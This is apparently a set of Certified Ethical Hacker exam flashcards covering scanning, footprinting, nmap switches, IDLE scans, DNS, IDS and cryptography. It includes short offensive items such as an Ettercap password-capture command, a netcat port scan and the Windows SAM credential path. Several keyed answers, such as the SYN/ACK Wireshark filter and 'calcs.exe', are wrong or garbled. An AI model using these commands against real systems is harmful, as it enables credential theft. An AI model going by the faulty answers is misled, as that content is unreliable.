Certified Ethical Hacker

Ace your homework & exams now with Quizwiz!

CIA triangle

Confidentiality, integrity, and availability. These are the three aspects of security.

D)Smurf attack

Disabling directed broadcasts on all routers is a mitigation for which attack? A)MAC flood B)SYN flood C)Routing table poisoning D)Smurf attack

No

Does the PNZ hold users?

TCP/UDP 53

Domain Name System (DNS) Zone Transfer

boot record

GrayFish injects its malicious code into the ___ which handles the launching of Windows at each step

Source host

Hostname of the primary DNS server for the zone (there should be an associated NS record for this as well).

social engineering attacks

IP geolocation lookup tools such as IP2Location helps to collect IP geolocation information about the target that helps the attackers to launch ___ such as spamming and phishing

Echo Reply

ICMP Type 0

Time Exceeded

ICMP Type 11

Destination Unreachable

ICMP Type 3

Source Quench

ICMP Type 4

klibc-horsepill.patch horsepill_setopt horsepill_infect

Horse Pill has three important parts

IP2Location IP Location Finder IP Address Geographical Location Finder IP Location GeoIP Lookup Tool Geo IP Tool

IP Geolocation Lookup Tools

IP Identification Number TCP Flow Control Method

IP Spoofing Detection Technigques

Linkedin.com Pipl.com

Personal information--like residential address and phone of employees can be found where?

Email

Phishing takes place using ____

TCP/UDP 389

Lightweight Directory Access Protocol (LDAP)

IP identification field TCP acknowledgement number TCP initial sequence number

TCP fields where data can be hidden are as follow:

distribute the payload covert channels

TCP parameters can be used by the attacker to ___ and to create ___

List Scan

This type of scan simply generates and prints a list of IPs/Names without actually pinging them

HTTP (TCP)

Port number 80

Scan result when a port is open (TCP Connect / Full Open Scan)

SYN --> <-- SYN + ACK ACK --> RST -->

SYN/FIN Scanning (IP Fragments)

SYN/FIN (Small IP Fragments) + Port (n) ---> <--- RST (if port is closed)

SRV

Service records

TCP/UDP 5060, 5061

Session Initiation Protocol (SIP)

monitor everything

Spytech SpyAgent allows you to ___ users do on your computer

Reconnaissance Scanning Gaining Access Maintaining Access Clearing Tracks

What are the five Hacking Phases?

Identify Security Objectives Application Overview Decompose Application Identify Threats Identify Vulnerabilities

What are the five sections of "threat modeling"?

Electronic Transaction and Code Sets Privacy Rule Security Rule National Identifier Requirements Enforcement

What are the five subsections of HIPAA

preparation assessment conclusion

What are the three main phases of Pen Testing?

1) telnet www.certifiedhacker.com 80 (press Enter) 2) GET / HTTP/1.0 (press ENTER twice)

What command is used for Banner Grabbing using Telnet?

arp -d * or netsh interface ip delete arpcache

What commands on a Windows machine will clear the ARP cache?

Trojan

What is a common method of covertly installing a bot or a handler on a client computer?

Script kiddie

What is a derogatory term for a hacker who used other people's programs to attack networks and deface websites?

Low-level software that hides backdoor processes

What is a rootkit?

Rogue access point

What is an unauthorized access point called?

Session reconstruction

What is the process called when an IDS reassembles small packets before performing expression matching?

Applicaiton -- Layer 7 Presentation -- Layer 6 Sesstion -- Layer 5

What layers of the OSI model does the PDU Data reside at?

C) It sets the home network as 202.78.55.6/24

What of the following is true regarding the Snort configuration file shown here: var HOME_NET 202.78.55.6/24 A) This rule configures Snort to alert on traffic from 202.78.55.6/24 B) This rule configures Snort to alert on traffic to 202.78.55.6/24 C) It sets the home network as 202.78.55.6/24 D) None of the above

Dictionary attack

What password cracking method uses an input list or file to discover the password?

Hybrid attack

What password cracking method uses word lists in combination with numbers and special characters?

Zenmap (Nmap's GUI Windows version)

What tool can be used to perform ping sweeps (ICMP Echo scanning)?

Dig (BIND 9)

What tool is native to Unix systems but available as a download for Windows systems, to test a DNS query and reports the results.

Mirroring

What tool type allows you to download an entire website onto the local system

D)Potential impact of the loss for each device

When IDS alerts report attacks on multiple devices, on which basis should the alerts be prioritized? A)Total number of alerts for each device B)Relative cost of each device C)Order in which they are recorded D)Potential impact of the loss for each device

It takes the prescribed action and stops evaluating the packet

When a router is examining a packet against an access control list and finds a traffic match, what action does the router take?

netsh advfirewall firewall show rule name=all

Which Windows Server 2012 command displays all rules within Windows Firewall?

Ethical hacker

Which kind of hacker only hacks for defensive purposes, so that he can think like a potential attacker?

A. APNIC

Your client's business is headquartered in Japan. Which regional registry would be the best place to look for footprinting information? A. APNIC B. RIPE C. ASIANIC D. ARIN E. LACNIC

Qualys FreeScan

for testing websites and applications for OWASP top risks and malware.

SEF (http://spl0it.org/projects/sef.html)

has great tools that can automate things such as extracting e-mail addresses out of websites and general preparation for social engineering. Also has ties into Metasploit payloads for easy phishing attacks.

Dumpster Diving

is looking for treasure in someone else's trash

PsInfo

list information about a system

script kiddie

unskilled, using other's scripts and tools

B. EDGAR Database

Which of the following is a good footprinting tool for discovering information on a publicly traded company's founding, history, and financial status? A. SpiderFoot B. EDGAR Database C. Sam Spade D. Pipl.com

A) Smartcard authentication

Which of the following is a mechanism associated with mandatory access control? A) Smartcard authentication B) User education C) Security policy D) Sign-in register

Session splicing

Which type of attack splits the attack payload into many small packets?

A. Implementing a split-horizon operation B. Restricting zone transfers

Brad is auditing an organization and is asked to provide suggestions on improving DNS security. Which of the following would be valid options to recommend? (Choose all that apply.) A. Implementing a split-horizon operation B. Restricting zone transfers C. Obfuscating DNS by using the same server for other applications and functions D. Blocking all access to the server on port 53

MAC flooding

Bob is attempting to sniff a wired network in his first pen test contract. He sees only traffic from the segment he is connected to. What can Bob do to gather all switch traffic?

Software used and its version Operating system used Sub-directories and parameters Filename, path, database field name, or query Scripting platform Contact details and CMS details

Browsing the target website may provide what kind of information?

OS Vulnerabilities

Buffer overflow vulnerabilities, bugs in operating system, unpatched operating system, etc.

Application Level Attacks

Buffer overflow, cross-site scripting, SQL injection, man-in-the-middle, session hijacking, denial-of-service, etc

True

Botnets are software applications that run automatic tasks over the Internet and often are coordinated to perform DDoS attacks? True or False

B. $207.50

Brad has done some research and determined a certain set of systems on his network fail once every ten years. The purchase price for each of these systems is $1200. Additionally, Brad discovers the administrators on staff, who earn $50 an hour, estimate five hours to replace a machine. Five employees, earning $25 an hour, depend on each system and will be completely unproductive while it is down. If you were to ask Brad for an ALE on these devices, what should he answer with? A. $2075 B. $207.50 C. $120 D. $1200

Active Banner Grabbing

-Specially crafted packets are sent to remote OS and the responses are noted -The responses are then compared with a database to determine the OS -Response from different OSes varies due to differences in TCP/IP stack implementation

Parallel, normal speed scan

-T3

Parallel, fast scan

-T4

XML output

-oX

DNS scan (list scan)

-sL

NULL scan

-sN

Protocol scan

-sO

Ping scan

-sP

RPC scan

-sR

Windows scan

-sW

Hping2 / Hping3

1) Command line network scanning and packet crafting tool for the TCP/IP protocol 2) It can be used for network security auditing, firewall testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting, remote uptime guessing, TCP/IP stacks auditing, etc.

MarketWatch The Wall Street Transcript Alexa Euromonitor Experian SEC Info The Search Monitor

Competitive Intelligence - What Are the Company's Plans? What websites?

ABI/INFORM Global SimilarWeb AttentionMeter Copernic Tracker SEMRush

Competitive Intelligence - What Expert Opinions Say About the Company? What websites?

D. Cease testing immediately and contact authorities.

During an assessment, your pen test team discovers child porn on a system. Which of the following is the appropriate response? A. Continue testing and report findings at out-brieg B. Continue testing but report findings to the business owners. C. Cease testing immediately and refuse to continue work for the client. D. Cease testing immediately and contact authorities.

A)To ensure critical data is not changed on the system

During security testing, what is the purpose of analyzing the interrupts within a piece of software? A)To ensure critical data is not changed on the system B)To test the access controls C)To validate the design D)To determine if secure coding principles were followed

HINFO

Host information record includes CPU type and OS

Redirect

ICMP Type 5

Echo Request

ICMP Type 8

Banner Grabbing Tools

ID Serve Netcraft Netcat Telnet

-Send SYN + ACK packet to the zombie machine to probe its IPID number -Every packet on the Internet has a fragment identification number (IPID), which increases every time a host sends IP packet -Zombie not expecting a SYN + ACK packet will send RST packet, disclosing the IPID -Analyze the RST packet from zombie machine to extract IPID

IDLE Scan: Step 1

-Send SYN packet to the target machine (port 80) spoofing the IP address of the "zombie" -If the port is open, the target will send SYN+ACK packet to the zombie and in response zombie sends RST to the target -If the port is closed, the target will send RST to the "zombie" but zombie will not send anything back

IDLE Scan: Step 2

-Probe "zombie" IPID again

IDLE Scan: Step 3

Prudent Policy

It provides maximum security while allowing known but necessary dangers. It blocks all services and only safe/necessary services are enabled individually; everything is logged

ISO/IEC 27001:2013

It provides requirements for creating, maintaining, and improving organizational IS (Information Security) systems.

Reduce Focus Area

It reduces attacker's focus area to specific range of IP address, networks, domain names, remote access, etc.

SSH

Jennifer is a system administrator who is researching a technology that will secure network traffic from potential sniffing by unauthorized machines. Jennifer is not concerned with the future impact on legitimate troubleshooting. What technology can Jennifer implement

tcpdump -w capture.log

Jenny is using tcpdump to capture traffic on her network. She would like to save the capture for later review. What command can she use?

A reverse ARP requests maps to two host

MAC spoofing applies a legitimate MAC address to an unauthenticated host, which allows the attacker to pose as a valid user. Based on your understanding of ARP, what would indicate a bogus client?

directory structure

Mirroring an entire website onto the local system enables an attacker to browse website offline; it also assists in finding ___ and other valuable information from the mirrored copy without multiple requests to web server

directory structure

Mirroring an entire website onto the local system enables an attacker to browse website offline; it also assists in finding ____ and other valuable information from the mirrored copy without multiple requests to web server.

illegal access

Misconfiguration vulnerabilities affect web servers, application platforms, databases, networks, or frameworks that may result in _____ or possible owning of the system

IPv4/IPv6 domain names

NetScan Tools Pro lists ____ addresses, hostnames, _____, email addresses, and URLs automatically or with manual tools

map of the target network

Network range information assists attackers to create a ______

intelligence gathering

Network scanning is one of the components of ___ an attacker uses to create a profile of the target organization

Information gathering Sniffing and eavesdropping Spoofing Session hijacking and Man-in-the-Middle attack DNS and ARP Poisoning Password-based attacks Denial-of-Service attack Compromised-key attack Firewall and IDS attacks

Network threats

TCP/IP nodes and routes

NetworkView discover _____ using DNS, SNMP, ports, NetBIOS, and WMI

DIG DNSWatch myDNSTools DomainTools Professional Toolset DNS Query Utility DNS Records DNS Lookup DNSData View DNS Query Utility

DNS Interrogation Tools

http://www.dnsstuff.com http://network-tools.com

DNS Interrogation Tools

Zone transfers

DNS port 53 TCP is used by what?

Name lookups

DNS port 53 UDP is used by what?

creates a back channel

DNS tunneling ___ to access a remote server and applications

port 53 (TCP and UDP)

DNS uses what port?

B)It detects which computers are online.

During a recent review of the events on your company's network, you discover that an attacker used Nmap to perform a ping sweep on your company's network. Which statement is true regarding this type of scan? A)It checks for open UDP ports. B)It detects which computers are online. C)It determines IP trust-based relationships between hosts. D)It sets the FIN, URG and PUSH flags in the TCP header.

Does not work on IPv6

Does NetBIOS name resolution work on IPv6?

No does not work

Does an XMAS scan work against Microsoft Windows?

(TTL) open

Doing ACK flag probe using the TTL version if the RST packet is less then 64 the port is ___.

(Window) open

Doing ACK flag probe using the Window version if the RST packet has anything other than zero, the port is ___.

(Full Connect) SYN/ACK RST

Doing a Full connect open ports respond with ___ and closed ports will respond with a ___.

(Stealth) SYN/ACK RST

Doing a Stealth connect open ports respond with ___ and closed ports respond with ____.

The value of the next sequence number in the packet being acknowledged or replied to

During a TCP handshake, which value is used for the acknowledgement number in a reply packet?

RST

During a Xmas tree scan what indicates a port is closed?

C)External interface of DMZ firewall

During a penetration test, a tester conducts the following scan: hping3 -A 209.15.13.134 -p 80 You receive back no response, indicating the port is filtered. Which type of network interface is being scanned? A)Internal interface of DMZ firewall B)Internal interface of public web server C)External interface of DMZ firewall D)External interface of public web server

A)IT security analyst

During a risk assessment, which of the following roles is responsible for providing the security architecture to the risk assessor? A)IT security analyst B)Business manager C)Facilities manager D)CIO

D)30 hosts in 8 subnets

You are performing a ping sweep to determine the live hosts running in network 204.17.5.0/27. How many possible hosts will be pinged? A)14 hosts in 16 subnets B)126 hosts in 2 subnets C)62 hosts in 4 subnets D)30 hosts in 8 subnets E)254 hosts in 1 subnet

A)N-tier

You have a front-end web server, an application server, and a database server that each perform a single and unique role in a group. What BEST describes this architecture? A)N-tier B)Service oriented architecture C)Separation of duties D)Dual control

Agentless auditing Compliance checks Content audits Customized reporting High-speed vulnerability discovery In-depth assessments Mobile device audits Patch management integration Scan policy design and execution

What are some features of Nessus?

-Network topology discovery and mapping -Export network diagrams to Visio -Network mappings for regulatory compliance -Multi-level network discovery -Auto-detect changes to network topology

What are some features of Network Topology Mapper?

Network vulnerabilities Open ports and running services Application and services vulnerabilities Application and services configuration errors

What are some things that Vulnerability Scanning checks for?

Website-Watcher Change Detection Follow That Page Page2RSS Watch That Page Check4Change OnWebChange Infominder TrackedContent Websnitcher Update Scanner

What are some tools for Monitoring Web Updates?

Google Earth Google Maps Wikimapia National Geographic Maps Yahoo Maps Bing Maps

What are some tools for finding the geographical location?

SiteDigger (www.mcafee.com) MetaGoofil (www.edge-security.com)

What are some tools to make Google hacking more powerful?

C)Automated vulnerability assessment tool

What is Nessus? A)Hacking tool that targets Web servers B)Security scanner that discovers hosts and services on a computer network C)Automated vulnerability assessment tool D)Wireless network detector, sniffer, and intrusion detection system

nmap -P cert.org/24 152.148.0.0/16

What is a nmap command for ICMP Echo Scanning

A way to reveal vulnerabilities

What is a vulnerability scan designed to provide to those executing it?

Identify a user

What is an SID used to do?

A)Covert channel

What is an illegitimate transfer of information between processes on a system or systems on a network? A)Covert channel B)Out of band C)API D)Privilege escalation

C. A UDP port scan of ports 1-1024 on a single address

What is being attempted with the following command? nc -u -v -w2 192.168.1.100 1-1024 A. A full connect scan on ports 1-1024 for a single address B. A full connect scan on ports 1-1024 for a subnet C. A UDP port scan of ports 1-1024 on a single address D. A UDP scan of ports 1-1024 on a subnet

Target of evaluation (TOE)

What is being tested.

Frames

What is built in the Data Link Layer?

Trojan horse attack

What is it called when an attacker attempts to steal passwords through an innocent looking application?

Each header is field is 16 bits in length Source Port - Destination Port Length - Checksum Data

What is the UDP datagram structure?

172.17.255.255

What is the broadcast address in the 172.17.0.0/16 network?

telnet <website name> 80

What is the command to retrieve header information from a web server using Telnet?

B)2048 bits

What is the current recommended RSA key length for a PKI? A)8192 bits B)2048 bits C)4096 bits D)1024 bits

Network, software or service available outside of normal internet traffic and search engines

What is the darknet?

An egg

What is the data payload called when ADMutate is in use?

get proper authorization

What is the first step in Pen Testing?

Footprinting

What is the first step in information gathering and provides a high-level blueprint of the target system or network.

A)Protect you when you are off the LAN

What is the main advantage of a host-based Intrusion Detection/Protection System (IDS/IPS) over a network-based solution? A)Protect you when you are off the LAN B)Requires port scanning C)Requires less training D)Resides at the perimeter of the network

Heap

What is the name for dynamic memory space that, unlike the stack, doesn't rely on sequential ordering or organization?

Netcat

What is the name of a simple UNIX utility that reads and writes data across network connections using either TCP or UDP?

Open Web Application Security Project (OWASP)

What is the name of the online community dedicated to web application security, known for their top 10 list of web vulnerabilities?

Scanning

What is the next step after footprinting a target?

B) The ethical hacker has authorization to proceed from the target owner

What is the primary difference between an ethical hacker and a cracker? A) The ethical hacker points out vulnerabilities but does not exploit them B) The ethical hacker has authorization to proceed from the target owner C) The ethical hacker does not use the same tools and techniques D) The ethical hacker does not have financial motivation

Hashing

What is the process of deriving a value that can be used to determine if any changes have been made in a message called?

A)It takes a message of arbitrary length as input and produces a 128-bit hash value output.

What is the purpose of MD5? A)It takes a message of arbitrary length as input and produces a 128-bit hash value output. B)It takes a message of up to 1 MB in size and produces a 128-bit hash value output. C)It takes a message of up to 1 MB is size and produces a 160-bit hash value output. D)It takes a message of arbitrary length as input and produces a 160-bit hash value output.

It evaluates how well a company adheres to its stated security policy

What is the purpose of a security audit?

It validates their correct application

What is the purpose of conducting security assessments on network resources?

To verify that files have not been changed or altered

What is the purpose of integrity hashes?

C)To automate SQL injection attacks

What is the purpose of using the Mole tool? A)To extract (reverse engineer) data points from a graph B)To read and write data across network connections C)To automate SQL injection attacks D)To recover passwords in a Windows system

C. SYN/ACK

What is the second step in the TCP thee-way handshake? A. SYN B. ACK C. SYN/ACK D. ACK-SYN E. FIN

nslookup [-options] {hostname | [server]}

What is the syntax for nslookup?

N-tier

What is the term for a design with a front-end server, an application server, and a database server that as a group perform a single and unique role?

Threat agent

What is the term for a person who attempts to exploit a threat?

False positive

What is the term for a system incorrectly preventing traffic or actions that should be allowed?

Mantrap

What is the term for a two-door system with a small room between them which allows for visual verification of each person entering a building?

Threat

What is the term for a vulnerability that exists that has the potential to be exploited, as compared to a vulnerability that exists but has no chance of being exploited?

Vulnerability

What is the term for a weakness or error that can lead to a compromise?

Covert channel

What is the term for any method used to bypass multi-level security solutions?

OSSTMM (Open Source Security Testing Methodology Manual)

What is the widely-adopted, peer-reviewed manual for operational security testing and analysis?

U.S. Computer Security Incident Response Team (CSIRT)

What organization acts as a single point of contact for reporting security incidents in the US?

gaining access phase

What phase of ethical hacking is when true attacks are leveled against the targets enumerated.

maintaining access

What phase of ethical hacking makes use of Trojans, rootkits, or any number of other methods.

gaining access

What phase of ethical hacking would you deliver a buffer overflow or SQL injection against a web application.

scanning and enumeration phase

What phase of ethical hacking would you do a ping sweep, network mapper, or a vulnerability scanner.

covering tracks

What phase of ethical hacking, attackers attempt to conceal their success and avoid detection by security professionals.

maintaining access phase

What phase of ethical hacking, hackers attempt to ensure they have a way back into the machine or system they've already compromised.

Regional Internet Registries (RIRs)

What provides overall management of the public IP address space within a given geographic region?

Upgrade the kernel immediately

What should you do when no known workarounds exists to eliminate a Linux kernel vulnerability?

ARP poisoning

What technique funnels all traffic back to a single client, allowing sniffing from all connected hosts?

Outside affiliate

What threat type is a non-trusted individual who uses open access to gain access to an organization's resources?

Insider affiliate

What threat type is a spouse, friend, or even client of an employee who uses the employee's credentials to gain access?

Pure insider

What threat type is an employee with all the rights and access associated with being employed by the company?

Encryption, integrity, and non-repudiation

What three protections does public key cryptography provide?

Absorb Add more services Shut down services

What three ways can you handle a DDoS attack?

CyberGhost

What tool allows you to protect your online privacy, surf anonymously, and access blocked or censored content It hides your IP and replaces it with one of your choice, allowing you to surf anonymously

TOR

What tool allows you to protect your privacy and defend yourself against network surveillance and traffic analysis

GFI LanGuard

What tool assists in asset inventory, change management, risk analysis, and proving compliance?

Website Watcher (http://aignes.com)

What tool can be used to check web pages for changes, automatically notifying you when there's an update?

Colasoft's Packet Builder

What tool can be used to craft segments and manipulate flags? This tool can also create fragmented packets to bypass IDS (and possibly firewalls)?

Netcraft http://www.netcraft.com

What tool can you use to find a company's restricted URLs?

ARIN

What tool can you use to find network ranges for a target and/or contact information?

whois

What tool can you use to queries registries and return information such as: including domain ownership, address, locations, and phone numbers?

OpenStego

What tool can: Data Hiding-It can hide any data within a cover file (e.g. images) Watermarking-Watermarking files (e.g. Images) with an invisible signature. It can be used to detect unauthorized file copying

Shodan

What tool is designed to help you find specific types of computers (routers, servers, and so on) connected to the Internet?

The next sequence number and acknowledgment number in an exchange

What two values must a hacker guess or estimate to highjack a TCP session?

ARP poisoning

What type of attack changes the IP address to MAC address mappings on two other devices, such that the two devices send frames to the attacker when they think they are sending frames to one another?

Brute force password attack

What type of attack is mitigated by an account lockout policy?

Denial of Service (DoS)

What type of attack overwhelms a target with requests that utilize all resources on the target?

Social engineering

What type of attack uses nontechnical means to obtain information useful in a network attack?

Two-factor or multi-factor authentication

What type of authentication is being performed when a USB token and retina scan are both required?

Circuit level gateway

What type of firewall monitors the TCP handshake between packets to determine whether a requested session is legitimate?

Personal firewall software

What type of software is Zonealarm?

An automatic SQL Injection exploitation tool

What type of tool is Mole?

SNMPv3

What version of SNMP encrypts the community strings?

SNMPv1

What version of SNMP is the strings sent in clear text?

Microsoft Baseline Security Analyzer (MBSA)

What vulnerability tool is specifically designed to locate potential exploits in the products from Microsoft?

Domain Name System Security Extensions (DNSSEC)

What was created to protect against DNS poisoning?

Truth in Caller ID Act

What was started in 2010 and states a person who knowingly transmits misleading caller ID information can be hit with a $10,000 fine per incident?

WEP

What wireless protocol has been compromised because of the way it implements the RC4 algorithm?

Telnet request to port 80 on a machine

What would the below output represent? C:\telnet 192.168.1.15 80HTTP/1.1 400 Bad Request Server: Microsoft - IIS/5.0 Date: Sat, 29 Jan 2011 11:14:19 GMT Content - Type: text/html Content - Length: 87 <html><head><title>Error</title></head> <body>The parameter is incorrect. <body><html> Connection to host lost.

To disguise the attack signature for the purpose of evading a signature based IDS

What would you use the tool ADMutate for?

Intranet Zone

What zone is Controlled zone with no heavy restrictions?

Internet DMZ

What zone is Controlled, as it provides a buffer between internal networks and internet?

Production Network Zone

What zone is Restricted zone, as it strictly controls direct access from uncontrolled networks?

Management Network Zone

What zone is Secured zone with strict polices?

Internet Zone

What zone is Uncontrolled, as it is outside the boundaries of an organization?

It continues to examine the packet after a match is found to identify any additional rules the packet might match.

When an IDS or IPS is examining a packet against an access control list and finds a traffic match, what action does the device take?

Closed Open

When doing an IDLE scan if the IPID increments by 1 then the port is ____. If the IPID increments by 2 then the port is _____.

Employee details Organization's website Company directory Location details Address and phone numbers Comments in HTML source code Security policies implemented Web server links relevant to the organization Background of the organization News articles Press releases

When footprinting what organization's information is collected?

User and group names System banners Routing tables SNMP information System architecture Remote system type System names Passwords

When footprinting what system information is collected?

Domain name Internal domain names Network blocks IP addresses of the reachable systems Rogue websites/private websites TCP and UDP services running Access control mechanisms and ACL's Networking protocols VPN Points IDSes running Analog/digital telephone numbers Authentication mechanisms System enumeration

When footprinting what type of Network information is collected?

B)Ignore the risk

When handling residual risk, which of the following is NOT an acceptable approach? A)Apply additional controls B)Ignore the risk C)Transfer the risk D)Accept the risk

spoofed address attacker's real address

When someone uses IP spoofing, the victim replies to the address, it goes back to the _____ and not to the _____

Keywords

When talking to a victim, using ____ can make an attack easier.

SNMP GET SNMP SET

When the SNMP management station asks a device for information, the packet is known as an ____. When it asks the agent to make a configuration change, the request is an ____ request.

D)Encrypt with the server's public key

When the client is creating a session key for an SSL connection, how does the client handle the resulting key? A)Encrypt with the client's public key B)Encrypt with the server's private key C)Encrypt with the client's private key D)Encrypt with the server's public key

D)Scanned port is not filtered

When you are performing ACK flag scanning, what does it mean if you receive a response of RST? A)Scanned port is open B)Scanned port is closed C)Scanned port is filtered D)Scanned port is not filtered

C:\Windows\System32\Config\SAM

Where are the passwords for the SIDs and RIDs located on Windows machines?

Market Watch The Wall Street Transcript Lipper Marketplace Euromonitor Experian SEC Info The Search Monitor

Where can you go to find: What are the company's plans? to use for competitive intelligence.

ABI/INFORM Global Compete Pro AttentionMeter Copernic Tracker Jobitorial SEMRush

Where can you go to find: What expert opinions say about the company? to use for competitive intelligence.

EDGAR Database Hoovers LexisNexis Business Wite

Where can you go to find: When did this company begin? How did it develop? to use for competitive intelligence.

D) c:\windows\system32\config\

Where is the SAM file located in Windows 7? A) c:\system32\ B) c:\system32\config\ C) c:\windows\system32\ D) c:\windows\system32\config\

C. EIP

Which CPU register points to the next command the CPU should execute? A. TDM B. NIL C. EIP D. EDI E. EBP

Protection profile

Which Common Criteria component defines a standard set of security requirements for a specific type of product?

Evaluation Assurance Level (EAL)

Which Common Criteria component defines how thoroughly the product is tested?

D) NS

Which DNS record type indicates the organization's DNS servers dedicated to answering requests? A) PTR B) SOA C) MX D) NS

C) MX

Which DNS record type indicates the organization's e-mail server? A) PTR B) SOA C) MX D) DX

C. A

Which DNS record type maps an IP address to a hostname and is used most often for DNS lookups? A. NS B. MX C. A D. SOA

Land

Which DoS attack sends traffic to the target with a spoofed IP of the target itself? Land Smurf Teardrop SYN flood

D. allintitle:SQL version

Which Google hack would display all pages that have the words SQL and Version in their title? A. inurl:SQL inurl:version B. allinurl:SQL version C. intitle:SQL inurl:version D. allintitle:SQL version

D) allintitle: SQL version

Which Google hack would display all pages that have words "SQL" and "Version" in their titles? A) inurl: SQL inurl: version B) allinurl: SQL version C) intitle: SQL inurl: version D) allintitle: SQL version

Type 11

Which ICMP message type/code indicates the packet could not arrive at the recipient due to exceeding its time to live? A. Type 11 B. Type 3, Code 1 C. Type 0 D. Type 8

C)Session reconstruction

Which IDS technique helps to mitigate session splicing attacks? A)Expression matching B)Session fragmentation C)Session reconstruction D)Whitelisting

802.2

Which IEEE standard describes Logical Link Control (LLC)?

802.1Q

Which IEEE standard describes VLAN encapsulation?

802.11

Which IEEE standard describes Wireless Fidelity (WiFi)?

802.1x

Which IEEE standard describes authentication?

127.0.0.1 or the loopback address

Which IP address does a computer use to refer to itself?

B)27006

Which ISO 27000 standard describes audits and certifications? A)27001 B)27006 C)27002 D)27005

showmount

Which Linux enumeration command displays all the shared directories on the machine

rpcinfo rpcclient

Which Linux enumeration command provides information on RPC in the environment.

finger

Which Linux enumeration command provides information on the user and host machine?

-sO

Which Nmap switch includes protocols in the output?

-sT

Which Nmap switch performs a normal connect scan?

-sS

Which Nmap switch performs a normal stealth scan?

-sP

Which Nmap switch performs a ping scan?

-sX

Which Nmap switch performs an inverse Xmas scan?

B) FIN

Which TCP flag brings communications to an orderly close? A) ACK B) FIN C) PSH D) SYN E) RST

B. PSH

Which TCP flag instructs the recipient to ignore buffering constraints and immediately send all data? A. URG B. PSH C. RST D. BUF

calcs.exe

Which Windows command line tool can be used to assign, display, or modify ACLs (Access Control Lists) to files or folders?

calcs.exe

Which Windows command line tool can be used to assign, display, or modify ACLs (access control lists) to files or folders?

ip.addr == 192.168.1.1

Which Wireshark filter displays only traffic from 192.168.1.1?

Diffie-Hellman

Which algorithm uses a shared private key to exchange public keys?

DNS poisoning

Which attack is based on changing the IP address to host name mapping?

C)TCP session hijacking

Which attack occurs at the Transport layer of the OSI model? A)ICMP flooding B)Telnet DoS attack C)TCP session hijacking D)MAC spoofing

DDoS attacks

Which attack uses a multitude of infected computers known as zombies or bots?

D)Trojan malware

Which attack vector commonly uses covert channels? A)Spear phishing B)SQL injection C)Network sniffing D)Trojan malware

Replay attacks

Which attacks can be mitigated by time stamps and nonce?

A) CACLS.exe

Which command can be used to assign, display, or modify the file and folder ACLs? A) CACLS.exe B) FPORT.exe C) CLACS.exe D) PERM.exe

A) CACLS.exe

Which command can be used to assign, display, or modify the folder ACLs? A) CACLS.exe B) FPORT.exe C) CLACS.exe D) PERM.exe

A. ./snort -dev -l ./log

Which command puts Snort into packet logger mode? A. ./snort -dev -l ./log B. ./snort -v C. ./snort -dev -l ./log -h 192.168.1.0/24 -c snort.conf D. None of the above

Switched Port Analyzer (SPAN) feature

Which configuration on a switch sends all traffic to the port on which the IDS is located?

D)Circuit level gateway

Which device normally operates at Layer 5 of the OSI model? A)Packet filtering firewall B)Proxy server C)Switch D)Circuit level gateway

C)Firewalls

Which device uses rule-based access control? A)Servers B)Clients C)Firewalls D)Switches

NTFS

Which file system is susceptible to an attack that uses alternative data streams?

B) tcp.flags==0x18

Which filter should be used to show all SYN/ACK packets? A) tcp.flags==0x02 B) tcp.flags==0x18 C) tcp.flags==0x12 D) tcp.flags==0x10

D) Traceroute

Which footprinting tool uses ICMP to provide information on pathways between senders and recipients? A) Whois B) EDGAR C) NMAP D) Traceroute

The impact on performance

Which impact needs to be considered before implementing a security audit?

Common Criteria

Which international standard establishes a baseline of confidence in the security functionality of IT products, and includes protection profiles and evaluation assurance levels?

23

Which is the port number used for Telnet?

C)Does not require managing server services

Which is true of PGP? A)Requires a licensing fee B)Provides a server-side scripting language C)Does not require managing server services D)Provides only privacy for data

A virus is malware A virus replicates with user interaction

Which is/are a characteristic of a virus?

Client's private key

Which key is required to decrypt a message encrypted by a client's public key?

Server's public key

Which key is required to decrypt a message that was encrypted with a server's private key?

Grey hat

Which kind of hacker believes in full disclosure, with or without permission?

White hat

Which kind of hacker hacks with permission?

Black hat

Which kind of hacker hacks without permission?

A)Single factor authentication

Which kind of security mechanism would require a retina scan and a fingerprint scan as logon credentials? A)Single factor authentication B)Multi-factor authentication C)Two-factor authentication D)Biometric authorization

C)FC-0 D)FC-1

Which layers of the Fibre Channel stack are replaced with Ethernet when using FCoE? (Choose all that apply.) A)FC-4 B)FC-3 C)FC-0 D)FC-1 E)FC-2

Switch

Which network device can block sniffing to a single network collision domain, create VLANs, and make use of SPAN ports and port mirroring?

D. TOE

Which of the following Common Criteria processes refers to the system or product being tested? A. ST B. PP C. EAL D. TOE

B)Hidden SSID E)MAC address filters

Which of the following WLAN security measures could be easily defeated with the use of a wireless sniffer? (Choose all that apply.) A)802.11i B)Hidden SSID C)EAP-TTLS D)WPA2 Enterprise E)MAC address filters

C) ip.addr=192.168.0.100 and tcp.flags.syn

Which of the following Wireshark filters is valid for three way handshake details originating from 192.168.0.100? A) ip==192.168.0.100 and tcp.syn B) ip.addr=192.168.0.100 and syn=1 C) ip.addr=192.168.0.100 and tcp.flags.syn D) ip.equals 192.168.0.100 and syn.equals on

A) Detach from the console and log all collected passwords to a file

Which of the following accurately describes the intent of the command Ettercap -NCLzs --quiet A) Detach from the console and log all collected passwords to a file B) Provide a list of all hosts on the subnet C) Begin a ping sweep D) Provide a list of all listening ports and who is connected to your machine

D)Notifies of threats based on active attack signatures

Which of the following action does vulnerability scanning NOT perform? A)Scans for open ports and running services B)Utilizes automated processes to gather information C)Operates proactively to locate issues D)Notifies of threats based on active attack signatures

B)Sending FTP traffic through a firewall that blocks ports 20 and 21

Which of the following actions becomes possible using HTTP tunneling? A)Determining the open ports on server B)Sending FTP traffic through a firewall that blocks ports 20 and 21 C)Identifying a hidden SSID D)Stealing a secure cookie from a web session

Netcraft (Banner Grabbing)

Reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site

This flag is set during initial communication

SYN (Synchronize)

Port is closed (Stealth Scan [Half-open scan])

SYN --> <-- RST

Scan result when a port is closed (TCP Connect / Full Open Scan)

SYN --> <-- RST

Port is open (Stealth Scan [Half-open scan])

SYN --> <-- SYN + ACK RST -->

TCP Session Establishment (Three-way Handshake)

SYN --> <-- SYN+ACK ACK -->

IDLE Scan: Step 2 (Port Open)

SYN Packet to port 80 spoofing zombie IP address --> (target) (zombie) <-- SYN+ACK packet RST Packet (IPID=31338) --> (target)

B. Assessment

